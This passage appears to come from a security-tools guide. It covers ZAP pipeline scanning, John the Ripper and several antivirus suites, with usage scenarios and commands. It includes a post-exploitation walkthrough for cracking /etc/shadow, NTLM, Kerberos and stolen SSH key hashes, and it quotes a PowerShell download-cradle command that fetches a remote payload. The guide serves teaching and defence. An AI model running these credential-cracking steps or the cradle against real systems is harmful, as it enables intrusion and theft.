ZAP’s key differentiator from Burp Suite Professional is that it is entirely free and open-source, making it the preferred choice for open-source projects, budget-constrained teams, and CI/CD pipeline integration. Its powerful REST API enables complete programmatic control of all scanning functions — making it ideal for automated DAST (Dynamic Application Security Testing) in DevSecOps workflows. GitHub Actions, GitLab CI, Jenkins, and Azure DevOps all have official ZAP integration options.

Key Features & Components

Feature / Component	Description
Active Scanner	Sends targeted attack payloads probing for SQLi, XSS, command injection, path traversal, SSRF, XXE, and 40+ other vulnerability types.
Passive Scanner	Analyses traffic flowing through ZAP’s proxy without sending attack payloads — identifies missing headers, insecure cookies, information disclosure, and more.
AJAX Spider	Headless Chromium-based crawler that renders JavaScript applications — discovering endpoints in AngularJS, React, and Vue.js SPAs invisible to traditional spidering.
REST API (JSON)	Full programmatic control via REST API — enabling CI/CD integration for automated scanning as part of every build, merge request, or deployment pipeline.
Fuzzer	Sends large numbers of malformed inputs to parameters using payload lists — discovering input validation failures, error handling weaknesses, and hidden behaviours.
OpenAPI/GraphQL Support	Imports OpenAPI 3.0, Swagger 2.0, and GraphQL schemas for comprehensive API testing coverage of all endpoints and operations.

Use Case Demonstration

Scenario

A DevSecOps engineer integrates ZAP into a GitHub Actions CI/CD pipeline so that every merge request to the main branch triggers an automated DAST scan of the staging environment. High and Critical findings automatically fail the pipeline, blocking vulnerable code from reaching production.

Step-by-Step Command Walkthrough

# ── CI/CD OPTION 1: GitHub Actions — ZAP baseline scan ──────────────────────
# .github/workflows/zap-dast.yml
name: ZAP DAST Security Scan
on:
  pull_request:
    branches: [ main ]
jobs:
  zap_scan:
    runs-on: ubuntu-latest
    steps:
      - name: ZAP Scan
        uses: zaproxy/action-full-scan@v0.9.0
        with:
          target: 'https://staging.myapp.internal'
          rules_file_name: '.zap/rules.tsv'
          fail_action: true
          artifact_name: 'zap-scan-report'

# ── CI/CD OPTION 2: Docker ZAP with full active scan ────────────────────────
docker run --rm -v $(pwd):/zap/wrk/:rw \
  ghcr.io/zaproxy/zaproxy:stable \
  zap-full-scan.py \
  -t https://staging.myapp.internal \
  -r zap_report.html \
  -J zap_report.json \
  -x zap_report.xml \
  -l WARN --auto -I

# ── MANUAL: API-driven scan in Python ────────────────────────────────────────
from zapv2 import ZAPv2
import time

target = 'https://staging.myapp.internal'
zap = ZAPv2(apikey='zapApiKey123',
            proxies={'http': 'http://localhost:8080',
                     'https': 'http://localhost:8080'})

print('Spidering target...')
scan_id = zap.spider.scan(target)
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

print('Active scanning...')
ascan_id = zap.ascan.scan(target)
while int(zap.ascan.status(ascan_id)) < 100:
    time.sleep(5)

alerts = zap.core.alerts(baseurl=target)
high_risk = [a for a in alerts if a['risk'] in ['High', 'Critical']]
print(f'High/Critical findings: {len(high_risk)}')
if high_risk:
    raise SystemExit('PIPELINE FAIL: High-risk vulnerabilities detected')

Outcome & Analysis

ZAP’s pipeline integration detects a Reflected XSS in the new search feature (introduced in the merge request under test) and a missing Content-Security-Policy header across 14 pages. The GitHub Actions pipeline fails with a clear error message and links to the HTML report. The developer fixes both issues before requesting another review — the second pipeline run passes cleanly. ZAP has prevented a Cross-Site Scripting vulnerability from ever reaching the production environment.

Overview

John the Ripper (JtR) is a fast, free, open-source password security auditing and recovery tool originally designed for Unix password cracking and now supporting over 400 hash and cipher types. It is available in two editions: the core version maintained by Openwall, and the community-enhanced ‘Jumbo’ version that adds GPU acceleration and a significantly expanded list of hash formats. JtR is used by penetration testers and forensic investigators to recover plaintext passwords from captured hash dumps.

Supported hash types include Linux crypt (MD5, SHA-256, SHA-512), Windows NTLM/NTLMv2/Net-NTLMv2, Kerberos 5 AS-REP/TGS, WPA-PSK, bcrypt, scrypt, Argon2, PBKDF2, SSH private key passphrases, PDF/ZIP/Office document passwords, PGP private key passphrases, and dozens more. JtR supports wordlist attacks, incremental (brute-force) mode, rule-based mangling, Markov chains, and hybrid attacks combining wordlists with brute-force.

Key Features & Components

Feature / Component	Description
400+ Hash & Cipher Types	Auto-detects hash format from the input file; explicit format override available — covers virtually every hash type encountered in real-world assessments.
Rule Engine	Transforms wordlist candidates using configurable rules (capitalisation, l33t substitution, appending numbers/symbols, reversal) to dramatically extend dictionary attack coverage.
Incremental Mode	True configurable brute-force across a character set (lowercase, alphanumeric, all printable) — suitable for short passwords or constrained character sets.
Single Crack Mode	Uses account metadata (GECOS field, username, home directory) to generate highly personalised guesses — often recovers trivial passwords before wordlist attacks.
Helper Tools	Format-specific extraction helpers: ssh2john (SSH keys), pdf2john (PDFs), office2john (Office docs), zip2john (archives), keepass2john (KeePass databases).
GPU Acceleration (Jumbo)	Hashcat-style OpenCL GPU cracking in the Jumbo build — dramatically faster than CPU-only cracking for salted hashes like bcrypt and SHA-512crypt.

Use Case Demonstration

Scenario

During a post-exploitation phase, a penetration tester has obtained the /etc/shadow file from a compromised Ubuntu 22.04 server and a Windows domain SAM/NTLM hash dump via secretsdump. They use JtR to recover plaintext passwords for further privilege escalation and domain pivoting.

Step-by-Step Command Walkthrough

# ── LINUX: Combine passwd and shadow, identify hash format ──────────────────
unshadow /etc/passwd /etc/shadow > /tmp/linux_combined.txt
head -3 /tmp/linux_combined.txt
# sysadmin:$6$rounds=5000$saltvalue$LongSHA512HashHere...:1001:...
# $6$ = SHA-512 crypt (default Ubuntu 22.04)

# ── STEP 1: Dictionary attack with rockyou.txt ───────────────────────────────
john --wordlist=/usr/share/wordlists/rockyou.txt \
     /tmp/linux_combined.txt

# ── STEP 2: Apply mangling rules to extend wordlist coverage ─────────────────
john --wordlist=/usr/share/wordlists/rockyou.txt \
     --rules=best64 \
     /tmp/linux_combined.txt

# ── STEP 3: Show all cracked passwords ───────────────────────────────────────
john --show /tmp/linux_combined.txt
# sysadmin:Summer2023!:1001:...
# dbadmin:Password1:1002:...

# ── WINDOWS: Crack NTLM hashes from secretsdump output ──────────────────────
# secretsdump.py output format: username:RID:LM:NTLM:::
john --format=NT \
     --wordlist=/usr/share/wordlists/rockyou.txt \
     /tmp/ntlm_hashes.txt

# ── STEP 4: Crack SSH private key passphrase ─────────────────────────────────
ssh2john /tmp/id_rsa_stolen > /tmp/id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/id_rsa.hash

# ── STEP 5: Kerberoasting — crack TGS service ticket hash ────────────────────
# (After running GetUserSPNs.py to extract TGS hashes)
john --format=krb5tgs \
     --wordlist=/usr/share/wordlists/rockyou.txt \
     /tmp/tgs_hashes.txt

# ── STEP 6: Incremental brute-force (4-character PINs) ───────────────────────
john --incremental=Digits --min-length=4 --max-length=4 \
     /tmp/linux_combined.txt

Outcome & Analysis

John the Ripper recovers passwords for 7 of 12 Linux accounts in 18 minutes including the sysadmin account (‘Summer2023!’). The NTLM hash dump yields 4 domain user passwords and 1 service account password (‘Svc$QL2022!’). The cracked SQL service account password enables direct authentication to the production MSSQL database — demonstrating both weak password policies and dangerous credential reuse across multiple systems.

Section 2: Endpoint Protection

This section covers 10 endpoint protection tools, providing in-depth analysis of each product’s architecture, capabilities, and practical application in enterprise security environments.

Overview

Norton 360 is a comprehensive multi-platform endpoint security suite developed by Gen Digital (formerly NortonLifeLock). It integrates real-time antivirus and anti-malware, a two-way smart firewall, VPN (via Secure VPN powered by a no-log network), dark web monitoring, parental controls (Safe Family), up to 100GB cloud backup, password manager (Norton Password Manager), and PC maintenance tools in a single subscription for up to 5 devices.

At its detection core, Norton 360 uses its SONAR (Suspicious Behaviour Analysis for New and Altered Reputation) technology — a machine-learning behavioural engine that monitors running processes in real time for suspicious actions. SONAR detects and blocks zero-day threats before signatures are available. Norton’s cloud-based Global Intelligence Network (GIN) aggregates threat data from 175 million consumer endpoints to deliver near-real-time threat intelligence to all installations.

Key Features & Components

Feature / Component	Description
SONAR Behavioural Engine	Real-time process monitoring that identifies malicious behaviour patterns rather than signatures — blocking zero-day threats without prior signatures.
Smart Two-Way Firewall	Monitors both inbound and outbound connections, blocks unauthorized application network access, and provides network intrusion detection.
Dark Web Monitoring	Continuously scans dark web markets, forums, and breach databases for the subscriber’s email addresses and up to 10 additional monitored emails.
Secure VPN (No-Log)	AES-256 encrypted VPN across 30+ server locations; automatically activates on untrusted Wi-Fi networks when set to auto-protect mode.
100GB Cloud Backup	Automatic encrypted cloud backup of selected files — protecting against ransomware destruction and hardware failure.
Norton Password Manager	Integrated vault for storing and auto-filling login credentials — free as part of the Norton 360 subscription.

Use Case Demonstration

Scenario

A financial consultant working remotely from a hotel connects to public Wi-Fi to access client investment portfolios. Norton 360 protects the session from Wi-Fi sniffing, blocks a phishing email with a ransomware dropper, and detects a potentially unwanted program installed from a bundled download.

Step-by-Step Command Walkthrough

# ── Norton 360 deployment and CLI operations (Windows) ──────────────────────
# Silent enterprise install via MSI
msiexec /i N360Setup.msi /quiet /norestart \
  LICENSEKEY="XXXXX-XXXXX-XXXXX-XXXXX-XXXXX"

# Norton Power Eraser — aggressive rootkit/PUP scan
NPE.exe /NORESTART /LOG:C:\Logs\NPE_scan.log

# Force virus definition update from command line
NortonCommandLineScanner.exe /UPDATE

# Manual full-system scan with logging
NortonCommandLineScanner.exe /SCAN:C:\ /LOG:C:\Logs\NortonScan.log

# Verify VPN auto-connect on untrusted network setting:
# Norton 360 > Secure VPN > Settings > Auto-Connect: ON
# Trusted networks: [Corporate office Wi-Fi SSID]

# ── Norton 360 protection events (what occurs in scenario) ───────────────────
# EVENT 1: Hotel Wi-Fi detected as untrusted network
#   Action: Secure VPN auto-activates, all traffic encrypted
# EVENT 2: Phishing email opened; .docm attachment downloaded
#   Norton intercepts macro execution via SONAR
#   Alert: 'Suspicious behaviour blocked: OFFICE.MACRO.DROPPER.GEN'
#   Action: Process terminated; file quarantined
# EVENT 3: PUP bundled with PDF reader installer
#   Norton Auto-Protect detects adware toolbar install attempt
#   Alert: 'Potentially Unwanted Program blocked: ADWARE.TOOLBAR.GEN'
#   Action: Installation blocked before registry modification

Outcome & Analysis

Norton 360 activates the VPN automatically on hotel Wi-Fi (preventing session hijacking), blocks the macro-enabled ransomware dropper at execution stage via SONAR (the macro never fires), and prevents a PUP installation from a bundled PDF reader. The client’s financial portfolio data remains protected throughout a session on an untrusted network — demonstrating layered endpoint protection for remote workers.

Overview

Bitdefender Total Security is an industry-recognised endpoint security suite consistently ranked among the top performers in independent AV-TEST, AV-Comparatives, and SE Labs evaluations. It uses a multi-layer defence architecture combining signature-based detection, heuristic analysis, machine learning models (trained on hundreds of millions of samples), cloud-based lookups via Bitdefender’s Global Protective Network (GPN — processing 11 billion security queries daily), behavioural monitoring, and sandboxed execution.

Key differentiators include Advanced Threat Defense (ATD) — a behavioural sandbox that observes processes before allowing execution — and Ransomware Remediation, which automatically rolls back ransomware-encrypted files using shadow copies. Bitdefender GravityZone provides centralised management for business deployments, enabling policy enforcement, threat visibility, patch management, and remote endpoint management via a cloud or on-premises console.

Key Features & Components

Feature / Component	Description
Advanced Threat Defense (ATD)	Sandboxes suspicious processes, monitoring their runtime behaviour before permitting execution — blocks malicious programs that evade static analysis.
Ransomware Remediation	Creates shadow copies of protected files and automatically restores them upon detecting ransomware encryption patterns — including remote ransomware over network shares.
Network Threat Prevention	Host-based network IPS inspecting all traffic for port scans, exploit delivery, ARP spoofing, brute-force attacks, and anomalous connections.
Anti-Exploit	Monitors browsers, Office applications, and PDF readers for memory corruption exploitation techniques (ROP, heap spray, shellcode injection).
Bitdefender GravityZone	Cloud-based central management for policy deployment, fleet-wide threat visibility, risk scoring, patch management, and one-click endpoint isolation.
VPN (200MB/day)	Integrated no-log VPN for encrypting connections on untrusted networks — upgradeable to unlimited traffic.

Use Case Demonstration

Scenario

A small accounting firm deploys Bitdefender Total Security across 15 workstations. An employee clicks a phishing link, downloads a fake invoice containing an Emotet ransomware dropper, and attempts to execute it. Bitdefender’s layered defences intercept the threat at multiple stages.

Step-by-Step Command Walkthrough

# ── GravityZone deployment — silent agent install via package ────────────────
setupdownloader.exe --downloadpackage [PackageToken] --silent

# ── GravityZone API: query recent threats (last 24h) ─────────────────────────
curl -s -u 'apiKey:' -X POST \
  'https://cloud.gravityzone.bitdefender.com/api/v1.0/jsonrpc/network' \
  -H 'Content-Type: application/json' \
  -d '{
    "id": "1",
    "jsonrpc": "2.0",
    "method": "getQuarantineItemsList",
    "params": {
      "filters": {
        "type": "malware",
        "startTime": "2024-05-16T00:00:00Z",
        "endTime": "2024-05-17T23:59:59Z"
      }
    }
  }'

# ── Protection event timeline for the scenario ────────────────────────────────
# T+00:00s  Employee downloads 'Invoice_2024.docm' via phishing URL
#   Anti-Phishing: URL blocked as malicious category
#   (employee bypasses via incognito browser — URL was new enough)
# T+00:03s  Macro attempts to execute PowerShell download cradle
#   ATD (Advanced Threat Defense): Office process observed
#   Spawning PowerShell with suspicious base64 argument
#   Action: PowerShell process killed; .docm quarantined
#   Alert: 'Trojan.Emotet.GenericMB detected and blocked'
# T+00:05s  Secondary dropper attempt via registry run key
#   Behavioural monitoring detects registry persistence write
#   Action: Registry change blocked; process terminated
# GravityZone console shows: 3 threat events | Status: Blocked

Outcome & Analysis

Bitdefender Total Security blocks the Emotet dropper at the PowerShell execution stage — before any payload is written to disk or any persistence mechanism is established. No files are encrypted. The GravityZone console provides the security administrator with a complete timeline of the three blocked events, the quarantined file hash (matching the Emotet signature in VirusTotal), and the affected endpoint’s status — all 15 workstations remain fully operational.

Overview

McAfee Total Protection (rebranded as McAfee+ across consumer tiers) is a widely deployed endpoint security suite offering real-time antivirus, firewall, web protection (WebAdvisor), identity theft protection, dark web monitoring, and credit monitoring. McAfee’s threat detection is powered by the Global Threat Intelligence (GTI) network — a cloud-based reputation system correlating threat data from over 500 million endpoint sensors worldwide, processing over 120 billion query connections per day.

For enterprise deployments, McAfee Endpoint Security (ENS) provides advanced threat detection with Adaptive Threat Protection (ATP), data loss prevention (DLP), web control, firewall, and MVISION EDR capabilities. McAfee ePolicy Orchestrator (ePO) — now Trellix ePO following McAfee Enterprise’s acquisition by Symphony Technology Group and rebranding as Trellix — provides centralised management across thousands of endpoints with comprehensive policy enforcement, compliance reporting, and incident response capabilities.

Key Features & Components

Feature / Component	Description
Global Threat Intelligence (GTI)	Cloud reputation system with 120B+ daily queries providing near-real-time threat intelligence for files, URLs, IPs, and email senders.
McAfee WebAdvisor	Browser extension providing safety ratings for search results and blocking known phishing, malware distribution, and fraudulent sites before navigation.
Identity Theft Protection	Credit monitoring, social media scanning, dark web monitoring, and up to $1M in identity theft coverage (US only) for relevant subscription tiers.
Vulnerability Scanner	Identifies outdated applications with known CVEs across installed software and the operating system — prompting update installation.
ePolicy Orchestrator (ePO/Trellix)	Centralised security management: policy deployment, compliance enforcement, software distribution, threat dashboard, and SIEM integration for enterprise fleets.
McAfee MVISION EDR	Cloud-native EDR module providing telemetry collection, threat hunting, automated investigation, and one-click containment for enterprise deployments.

Use Case Demonstration

Scenario

An IT security administrator uses McAfee ePO (Trellix ePO) to enforce a consistent security baseline across 500 corporate endpoints — deploying the latest virus definitions, enforcing USB device control, and identifying the 23 endpoints with critical outstanding vulnerability patches.

Step-by-Step Command Walkthrough

# ── McAfee Agent silent deployment via ePO ───────────────────────────────────
FrameworkService.exe /install /silent /norestart \
  /siteinfo=SiteName /port=8443

# ── ePolicy Orchestrator REST API — endpoint compliance query ────────────────
curl -k -u 'admin:P@ssword!' \
  'https://epo.corp.local:8443/remote/core.executeQuery?
  target=EPOLeafNode&
  select=(EPOLeafNode.NodeName,EPOComputerProperties.OSType,
  EPOComputerProperties.DatDate)&
  where=(EPOComputerProperties.DatDate+lt+"2024-05-10")'

# ── USB Device Control policy enforcement ────────────────────────────────────
# ePO Console > Policy Catalog > McAfee Device Control > New Policy
# Rule: Block Class = USB Storage Devices
# Exception: Allow USB devices with specific VID/PID (corporate encrypted drives)
# Assignment: All Windows Endpoints group

# ── Push definitions update to all managed endpoints ─────────────────────────
curl -k -u 'admin:P@ssword!' \
  'https://epo.corp.local:8443/remote/scheduler.runTask?
  taskName=McAfee+Agent+Wake-Up&
  filter=EPOComputerProperties.OSType+eq+"Windows"'

# ── Query endpoints missing Critical patches ──────────────────────────────────
curl -k -u 'admin:P@ssword!' \
  'https://epo.corp.local:8443/remote/core.executeQuery?
  target=EPOMcAfeePatches&
  select=(EPOLeafNode.NodeName,EPOMcAfeePatches.PatchName,
  EPOMcAfeePatches.Severity)&
  where=(EPOMcAfeePatches.Severity+eq+"Critical"+AND+
  EPOMcAfeePatches.IsInstalled+eq+false)'

# ── Generate executive compliance summary report ──────────────────────────────
# ePO Console > Reporting > New Report > Template: Executive Summary
# Sections: Infection Activity | Policy Compliance | Unmanaged Nodes

Outcome & Analysis

The ePO compliance query identifies 23 endpoints with McAfee virus definitions older than 7 days, 31 endpoints missing Critical OS patches, and 7 endpoints with USB device control policy not yet applied (offline at time of push). The administrator schedules a forced update run, deploys the USB control policy to re-connected endpoints, and generates an executive summary report documenting 93.8% overall compliance — with a plan to reach 100% within 48 hours.

Overview

Avast One is a unified security and privacy platform serving over 435 million users globally — one of the largest user bases of any endpoint security product. Built on Avast’s extensive threat detection network that processes 1.5 billion threat detections monthly across both consumer and enterprise environments, Avast One combines antivirus, a smart firewall, Wi-Fi Inspector (network intrusion detection), Ransomware Shield (folder protection), performance optimizer, browser cleanup, data breach monitoring, and an integrated VPN.

Avast’s CyberCapture technology automatically uploads suspicious, never-before-seen files to Avast’s cloud sandbox for automated behavioral analysis, returning a verdict and updated signature within seconds for all Avast users worldwide. Avast Business provides a centralised management console (Avast Business Hub) for MSPs and enterprise deployments.

Key Features & Components

Feature / Component	Description
CyberCapture	Automatically uploads unrecognised files to the cloud sandbox for real-time behavioral analysis — protecting all Avast users as soon as a new threat is identified.
Wi-Fi Inspector	Scans the connected wireless network for weak router credentials, ARP spoofing, rogue devices, UPnP vulnerabilities, and outdated router firmware CVEs.
Ransomware Shield	Monitors designated protected folders — blocks any untrusted process from modifying files in protected locations, stopping ransomware encryption attacks.
Behaviour Shield	Heuristic monitoring of running processes for chains of actions indicative of exploitation, fileless malware, or post-exploitation activity.
Hack Alerts & Breach Monitoring	Monitors registered email addresses against known data breach databases — immediately alerts users when their credentials appear in a breach.
Smart Firewall	Application-aware outbound and inbound firewall with automatic rules for known applications and alert prompts for unknown outbound connection attempts.

Use Case Demonstration

Scenario

An Avast One user’s home router is targeted by an attacker performing ARP cache poisoning to position themselves as a man-in-the-middle. Avast One’s Wi-Fi Inspector detects the network anomaly, alerts the user, and activates the VPN to protect ongoing communications before any data is intercepted.

Step-by-Step Command Walkthrough

# ── Avast One Wi-Fi Inspector findings (representative output) ───────────────
# Triggered by: Manual scan (Avast One > Explore > Wi-Fi Inspector)
# Or: Automatic scan on network join

# ── FINDING 1: ARP Cache Poisoning Detected (Critical) ───────────────────────
Device: 192.168.1.105 (Attacker laptop)
Issue:  ARP reply from 192.168.1.105 claiming MAC AA:BB:CC:DD:EE:FF
        which is the MAC of your router (192.168.1.1)
Risk:   All network traffic may be intercepted by 192.168.1.105
Action recommended: Disconnect from this network immediately
Avast action: Secure VPN auto-activated

# ── FINDING 2: Router uses default credentials ────────────────────────────────
Device: Router (192.168.1.1 — ASUS RT-AX88U)
Issue:  Admin panel accessible with default credentials admin/admin
Risk:   Anyone on the network can reconfigure your router
Action recommended: Change router admin password immediately

# ── FINDING 3: UPnP enabled — external exploit possible ─────────────────────
Device: Router (192.168.1.1)
Issue:  UPnP service accessible from WAN side (CVE-2020-12695 — CallStranger)
Risk:   Attacker can use router as SSRF pivot or DDoS amplifier
Action recommended: Disable UPnP in router settings

# ── Verify VPN activation (Avast One app) ────────────────────────────────────
# Avast One > Secure Line VPN > Status: Connected
# Location: Nearest server | IP: 85.239.x.x (masked)
# All traffic now encrypted through Avast VPN tunnel

Outcome & Analysis

Avast One’s Wi-Fi Inspector detects the ARP poisoning attack within 30 seconds of the attacker beginning the attack, displays a Critical alert describing the exact source device and risk, and activates the VPN automatically — routing all traffic through an encrypted tunnel before any plaintext session data can be intercepted. The attacker captures only encrypted VPN traffic, rendering the man-in-the-middle attack ineffective.

Overview

Kaspersky Total Security is a feature-rich, multi-platform endpoint security suite from Kaspersky Lab, consistently achieving top performance scores in AV-TEST and AV-Comparatives independent evaluations. Kaspersky’s Security Network (KSN) processes over 400,000 new malicious object records per day from over 1 billion participating devices — providing threat intelligence to all products with minimal latency.

Kaspersky’s System Watcher component uses Behavioral Stream Signatures (BSS) to monitor sequences of process actions and can automatically roll back malicious changes — including ransomware file encryption. Its Application Control feature categorises all running applications into trust groups (Trusted, Low Restricted, High Restricted, Untrusted) and enforces least-privilege execution accordingly. Safe Money provides an isolated browser environment for financial transactions.

Key Features & Components

Feature / Component	Description
System Watcher (BSS)	Behavioural Stream Signatures detect malicious action sequences in real time and automatically roll back ransomware-induced file modifications.
Application Control	Categorises applications by trust group and enforces least-privilege execution rights — restricting untrusted applications from accessing the network or system resources.
Safe Money	Isolated, hardened browser environment (separate process space) activated automatically for banking URLs — prevents keylogging and screen capture during financial transactions.
Kaspersky Security Network (KSN)	Cloud reputation lookups for files, URLs, and processes — providing sub-second verdicts on unknown objects from global telemetry.
Vulnerability Scan	Identifies software with known CVEs across all installed applications and the OS; integrated update recommendations and one-click patching.
Anti-Spam & Anti-Phishing	Deep header and content analysis of email messages with phishing URL detection and blacklist-based sender reputation checking.

Use Case Demonstration

Scenario

A banking customer uses Kaspersky Safe Money to protect an online banking session on a laptop known to be infected with a banking keylogger. Kaspersky’s Safe Money isolates the browser process and encrypts keystrokes at the kernel level — preventing the keylogger from capturing banking credentials.

Step-by-Step Command Walkthrough

# ── Kaspersky Total Security CLI operations (Windows) ────────────────────────
# Full system scan from command line
avp.com SCAN /ALL /i0 /fa /REPORT:C:\Logs\KSP_scan.txt
# /ALL = all objects   /i0 = skip on errors   /fa = scan all files

# Force definition update
avp.com UPDATE

# Enable Safe Money protection for specific URL
# Kaspersky > Settings > Protection > Safe Money > Manage Websites
# Add: https://onlinebanking.mybank.com
# Action: Run browser in Protected Mode

# ── Safe Money protection mechanisms (active during session) ─────────────────

# 1. PROCESS ISOLATION
#    Browser opens in separate protected process with memory isolation
#    Other processes cannot read browser memory (prevents form grabbing)

# 2. KEYSTROKE PROTECTION
#    Keystrokes encrypted at kernel driver level before user-mode delivery
#    Keylogger captures encrypted garbage, not actual keystrokes
#    On-screen keyboard option available for additional protection

# 3. SCREEN CAPTURE PROTECTION
#    Screenshot and screen-recording APIs return blank/black image
#    when Safe Money browser is the active window

# 4. TLS CERTIFICATE VALIDATION
#    Safe Money validates SSL cert against Kaspersky's known-good store
#    Warning shown if certificate is unexpected (MITM detection)

# 5. VIRTUAL KEYBOARD (optional)
#    On-screen keyboard for mouse-click-only password entry
#    Prevents both hardware and software keylogging

Outcome & Analysis

The banking keylogger attempts to capture keystrokes during the Safe Money session but records only encrypted driver-level data — no usable credential material. When the keylogger attempts to take a screenshot of the banking portal, it captures a blank black image. Kaspersky’s System Watcher subsequently detects the keylogger’s persistence mechanism (registry run key creation) and rolls back the change, quarantining the keylogger binary and generating a detailed threat report.

Overview

Trend Micro Maximum Security is a comprehensive multi-device security suite from Trend Micro — a company with over 35 years of cybersecurity experience. Trend Micro’s Smart Protection Network processes 250 billion security queries daily across 500 million endpoints and 16 million web gateways, providing real-time threat intelligence to all products. Trend Micro is particularly recognised for its strength in detecting fileless malware and Living-off-the-Land (LotL) attack techniques that bypass traditional signature-based detection.

Key features include Folder Shield (ransomware protection), Pay Guard (isolated financial browser), Social Media Privacy Scanner, Fraud Buster (AI-based email scam detection), and a multi-device licence covering Windows, macOS, Android, iOS, and Chromebook. Trend Micro Apex One provides enterprise-grade EDR and XDR capabilities with cloud-native central management.

Key Features & Components

Feature / Component	Description
Folder Shield	Designates protected folders whose contents cannot be modified by any untrusted or newly-installed process — blocking ransomware encryption of protected files.
Pay Guard	Isolated browser window for financial transactions with screenshot protection, keylogger blocking, and verified HTTPS certificate checking.
Fileless Threat Detection	Detects and blocks PowerShell abuse, WMI-based persistence, script-based droppers, and reflective DLL injection — attacks that leave no file on disk.
Fraud Buster	AI writing-style analysis for email content — detects BEC (Business Email Compromise) impersonation and phishing by analysing language patterns regardless of sender identity.
Trend Micro Smart Protection Network	Cloud-based file/URL/IP reputation with 250B daily queries — near-real-time protection against newly emerging threats.
Mobile Security Integration	Extends protection to Android and iOS devices under the same subscription — scanning apps, blocking malicious sites, and detecting unauthorized device changes.

Use Case Demonstration

Scenario

An attacker uses a fileless Living-off-the-Land technique — a malicious PowerShell command encoded in base64 executed via a phishing email macro — attempting to download and execute a reverse shell entirely in memory without touching the disk. Trend Micro intercepts the attack at the PowerShell stage.

Step-by-Step Command Walkthrough

# ── Attack vector (test environment only) ────────────────────────────────────
# Macro in phishing .docm drops the following command:
# powershell -WindowStyle Hidden -EncodedCommand
# SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYg...
# Decoded: IEX(New-Object Net.WebClient).DownloadString('http://192.168.99.1/payload.ps1')

# ── Trend Micro detection and response timeline ───────────────────────────────
# T+00.0s: Macro execution begins in WINWORD.EXE
#   Trend Micro Script Analyser: Office process spawning PowerShell
#   Behavioural rule fired: 'SCRIPT_OFFICE_SPAWN_POWERSHELL'
# T+00.1s: PowerShell launches with -EncodedCommand flag
#   Detection: TROJ_POWLOAD.AUSXF
#   Action: PowerShell process immediately terminated
#   Alert: 'Fileless threat blocked: Suspicious PowerShell download cradle'
# T+00.2s: Trend Micro logs the incident

# Log entry example:
Threat:          TROJ_POWLOAD.AUSXF
Detection Type:  Behavioural (Fileless)
Process:         powershell.exe (PID 7834) parent WINWORD.EXE (PID 4120)
Action:          Process terminated
Payload URL blocked: http://192.168.99.1/payload.ps1 [Reputation: Malicious]

# ── Trend Micro Apex One API: query recent detections ────────────────────────
curl -H 'Authorization: Bearer [API_TOKEN]' \
  'https://apexcentral.trendmicro.com/WebApp/API/
   SuspiciousObjectV1/SuspiciousObjects?type=url&limit=20'

Outcome & Analysis

Trend Micro’s fileless threat engine detects the PowerShell download cradle within 100 milliseconds of execution — before the script can download any payload. The PowerShell process is terminated, the macro-embedded .docm is quarantined, and the C2 URL is blocked at the network level via Smart Protection Network. No payload is ever downloaded, no reverse shell is established, and no disk artefact is created — a complete prevention of a sophisticated LotL attack.

Overview

ESET NOD32 Antivirus is a lightweight, high-performance endpoint security solution developed by ESET, a Slovak company with over 35 years of cybersecurity experience. NOD32 has consistently won the VB100 award from Virus Bulletin for nearly 200 consecutive periods — the longest unbroken record in the industry. Its defining characteristic is an exceptionally low system resource footprint (typically less than 50MB RAM and 1% CPU during real-time scanning) while maintaining best-in-class detection rates.

NOD32’s ThreatSense engine combines multiple detection layers: signatures, advanced heuristics, machine learning models, ESET LiveGrid cloud reputation, Advanced Memory Scanner (AMS), and Exploit Blocker. Advanced Memory Scanner monitors running processes in memory — catching malware after it unpacks and decrypts itself, defeating obfuscation and packing techniques. ESET PROTECT (cloud) provides centralised management for business deployments.

Key Features & Components

Feature / Component	Description
ThreatSense Engine	Multi-layer detection: signatures, heuristics, ML models, LiveGrid cloud lookup, DNA detection (partial signature matching for malware families).
Advanced Memory Scanner (AMS)	Monitors process virtual memory at runtime — detects packed, encrypted, or obfuscated malware after it deobfuscates itself in memory.
Exploit Blocker	Monitors frequently-exploited application types (browsers, Office, PDF readers, Java) and blocks memory corruption techniques (ROP chains, heap spray, SEH overwrites).
ESET LiveGrid	Cloud-based file reputation with sub-second response times — provides verdicts on unknown files based on telemetry from millions of ESET endpoints worldwide.
Low Resource Footprint	Typically under 50MB RAM and <1% CPU during real-time protection — suitable for older hardware, high-performance workstations, and server environments.
ESET PROTECT	Cloud-based central management console for policy deployment, threat visibility, one-click isolation, remote scan, and fleet-wide reporting.

Use Case Demonstration

Scenario

A heavily obfuscated malware sample is delivered via a malicious PDF. The initial static scan does not match any known signature due to multi-layer packing. ESET’s Advanced Memory Scanner detects the malware after it unpacks itself into memory during execution.

Step-by-Step Command Walkthrough

# ── ESET NOD32 CLI scanner (ecls) operations ─────────────────────────────────
# Full system scan with quarantine action and report
ecls /subdir /quarantine /log-file=C:\Logs\eset_scan.txt \
     /log-rewrite /unsafe /clean-mode=standard C:\

# Scan specific directory (e.g., Downloads)
ecls /subdir /log-file=C:\Logs\downloads_scan.txt \
     C:\Users\user\Downloads

# Update virus signatures from command line
egui /update

# ── Advanced Memory Scanner detection workflow ────────────────────────────────
# T+0.0s: User opens malicious PDF (infected_invoice.pdf)
#   ESET static scan: No signature match (file is newly packed)
#   LiveGrid: No cloud record (sample submitted — under analysis)
# T+0.3s: PDF reader spawns embedded JavaScript engine
#   Exploit Blocker: No exploit technique detected yet
# T+0.7s: Malware unpacks first layer (XOR decode in memory)
#   Advanced Memory Scanner: Begins monitoring heap allocations
# T+1.1s: Malware unpacks second layer (PE executable in memory)
#   AMS: Executable code pattern detected in heap memory of Acrobat.exe
#   Action: Suspicious memory region scanned
#   Match: Win32/Filecoder.QR (Ransomware family) — 98.7% AMS match

ESET Alert: ADVANCED MEMORY SCANNER DETECTED THREAT
Process:  AcroRd32.exe (PID 5512)
Threat:   Win32/Filecoder.QR
Method:   Memory scan (post-unpack detection)
Action:   Process terminated; memory threat logged; PDF quarantined

Outcome & Analysis

ESET’s Advanced Memory Scanner intercepts the obfuscated ransomware at the moment it unpacks its executable payload in process memory — before any ransomware encryption, persistence, or C2 communication takes place. The detection is reported as a post-unpack memory scan match. ESET submits the original PDF hash to LiveGrid, and a signature for the packer is distributed to all ESET endpoints globally within 2 hours.

Overview

